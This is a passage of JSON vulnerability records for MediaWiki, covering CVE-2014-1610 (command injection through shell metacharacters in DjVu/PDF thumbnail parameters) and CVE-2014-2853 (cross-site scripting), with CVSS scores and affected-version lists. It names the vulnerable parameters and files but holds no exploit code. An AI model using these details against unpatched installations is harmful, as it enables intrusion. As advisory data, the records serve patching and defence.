"AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T12:24:33", "description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in (1) the page parameter to includes/media/DjVu.php; (2) the w parameter (aka width field) to thumb.php, which is not properly handled by includes/media/PdfHandler_body.php; and possibly unspecified vectors in (3) includes/media/Bitmap.php and (4) includes/media/ImageHandler.php.", "cvss3": {}, "published": "2014-01-30T23:55:00", "type": "cve", "title": "CVE-2014-1610", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1610"], "modified": "2016-05-25T15:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.4"], "id": "CVE-2014-1610", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:47", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php in MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers to inject arbitrary web script or HTML via the sort key in an info action.", "cvss3": {}, "published": "2014-04-29T18:55:00", "type": "cve", "title": "CVE-2014-2853", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2015-09-10T15:28:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.3.14", "cpe:/a:mediawiki:mediawiki:1.3.13", "cpe:/a:mediawiki:mediawiki:1.20", "cpe:/a:mediawiki:mediawiki:1.6.6", "cpe:/a:mediawiki:mediawiki:1.2.6", "cpe:/a:mediawiki:mediawiki:1.3.15", "cpe:/a:mediawiki:mediawiki:1.5.8", "cpe:/a:mediawiki:mediawiki:1.12.3", "cpe:/a:mediawiki:mediawiki:1.3.7", "cpe:/a:mediawiki:mediawiki:1.13.4", "cpe:/a:mediawiki:mediawiki:1.4.3", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.10.4", "cpe:/a:mediawiki:mediawiki:1.9.0", "cpe:/a:mediawiki:mediawiki:1.6.3", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.13.1", "cpe:/a:mediawiki:mediawiki:1.5.6", "cpe:/a:mediawiki:mediawiki:1.16.0", "cpe:/a:mediawiki:mediawiki:1.18.0", "cpe:/a:mediawiki:mediawiki:1.5.2", "cpe:/a:mediawiki:mediawiki:1.15.2", "cpe:/a:mediawiki:mediawiki:1.2.5", "cpe:/a:mediawiki:mediawiki:1.10.1", "cpe:/a:mediawiki:mediawiki:1.16.1", "cpe:/a:mediawiki:mediawiki:1.2.3", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.10.0", "cpe:/a:mediawiki:mediawiki:1.8.0", "cpe:/a:mediawiki:mediawiki:1.15.5", "cpe:/a:mediawiki:mediawiki:1.6.12", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.7.0", "cpe:/a:mediawiki:mediawiki:1.6.7", "cpe:/a:mediawiki:mediawiki:1.4.0", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.21.4", "cpe:/a:mediawiki:mediawiki:1.3.9", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.5.0", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.4.9", "cpe:/a:mediawiki:mediawiki:1.2.1", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.4.12", "cpe:/a:mediawiki:mediawiki:1.3.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.15.4", "cpe:/a:mediawiki:mediawiki:1.17.1", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.4.1", "cpe:/a:mediawiki:mediawiki:1.13.3", "cpe:/a:mediawiki:mediawiki:1.8.4", "cpe:/a:mediawiki:mediawiki:1.17", "cpe:/a:mediawiki:mediawiki:1.3", "cpe:/a:mediawiki:mediawiki:1.5", "cpe:/a:mediawiki:mediawiki:1.2.0", "cpe:/a:mediawiki:mediawiki:1.3.5", "cpe:/a:mediawiki:mediawiki:1.18", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.4", "cpe:/a:mediawiki:mediawiki:1.3.3", "cpe:/a:mediawiki:mediawiki:1.6.8", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.13.2", "cpe:/a:mediawiki:mediawiki:1.11.2", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.3.12", "cpe:/a:mediawiki:mediawiki:1.3.2", "cpe:/a:mediawiki:mediawiki:1.8.5", "cpe:/a:mediawiki:mediawiki:1.13.0", "cpe:/a:mediawiki:mediawiki:1.10.3", "cpe:/a:mediawiki:mediawiki:1.3.8", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.4.7", "cpe:/a:mediawiki:mediawiki:1.6.5", "cpe:/a:mediawiki:mediawiki:1.4.4", "cpe:/a:mediawiki:mediawiki:1.18.1", "cpe:/a:mediawiki:mediawiki:1.20.8", "cpe:/a:mediawiki:mediawiki:1.1.0", "cpe:/a:mediawiki:mediawiki:1.17.3", "cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.2.2", "cpe:/a:mediawiki:mediawiki:1.12.2", "cpe:/a:mediawiki:mediawiki:1.19.14", "cpe:/a:mediawiki:mediawiki:1.4.5", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.6.1", "cpe:/a:mediawiki:mediawiki:1.11.1", "cpe:/a:mediawiki:mediawiki:1.9.4", "cpe:/a:mediawiki:mediawiki:1.6.4", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.4.10", "cpe:/a:mediawiki:mediawiki:1.17.4", "cpe:/a:mediawiki:mediawiki:1.4.13", "cpe:/a:mediawiki:mediawiki:1.9.3", "cpe:/a:mediawiki:mediawiki:1.11.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.3.4", "cpe:/a:mediawiki:mediawiki:1.7.1", "cpe:/a:mediawiki:mediawiki:1.6.0", "cpe:/a:mediawiki:mediawiki:1.14.0", "cpe:/a:mediawiki:mediawiki:1.17.0", "cpe:/a:mediawiki:mediawiki:1.17.2", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.11", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.10.2", "cpe:/a:mediawiki:mediawiki:1.21.5", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.12.0", "cpe:/a:mediawiki:mediawiki:1.4.11", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.14.1", "cpe:/a:mediawiki:mediawiki:1.6.11", "cpe:/a:mediawiki:mediawiki:1.5.3", "cpe:/a:mediawiki:mediawiki:1.8.2", "cpe:/a:mediawiki:mediawiki:1.5.1", "cpe:/a:mediawiki:mediawiki:1.12.1", "cpe:/a:mediawiki:mediawiki:1.15.1", "cpe:/a:mediawiki:mediawiki:1.9.6", "cpe:/a:mediawiki:mediawiki:1.4.6", "cpe:/a:mediawiki:mediawiki:1.4.14", "cpe:/a:mediawiki:mediawiki:1.8.1", "cpe:/a:mediawiki:mediawiki:1.3.11", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.5.5", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.18.2", "cpe:/a:mediawiki:mediawiki:1.6.10", "cpe:/a:mediawiki:mediawiki:1.2.4", "cpe:/a:mediawiki:mediawiki:1.5.4", "cpe:/a:mediawiki:mediawiki:1.9.2", "cpe:/a:mediawiki:mediawiki:1.15.0", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.3.10", "cpe:/a:mediawiki:mediawiki:1.9.1", "cpe:/a:mediawiki:mediawiki:1.6.2", "cpe:/a:mediawiki:mediawiki:1.16.2", "cpe:/a:mediawiki:mediawiki:1.18.3", "cpe:/a:mediawiki:mediawiki:1.5.7", "cpe:/a:mediawiki:mediawiki:1.3.0", "cpe:/a:mediawiki:mediawiki:1.15.3", "cpe:/a:mediawiki:mediawiki:1.3.6", "cpe:/a:mediawiki:mediawiki:1.12.4", "cpe:/a:mediawiki:mediawiki:1.4.2", "cpe:/a:mediawiki:mediawiki:1.6.9", "cpe:/a:mediawiki:mediawiki:1.4.8", "cpe:/a:mediawiki:mediawiki:1.7.2", "cpe:/a:mediawiki:mediawiki:1.8.3", "cpe:/a:mediawiki:mediawiki:1.9.5", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.7.3"], "id": "CVE-2014-2853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta6:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta5:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc3:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.10:*:*:*:*:*:*:*", 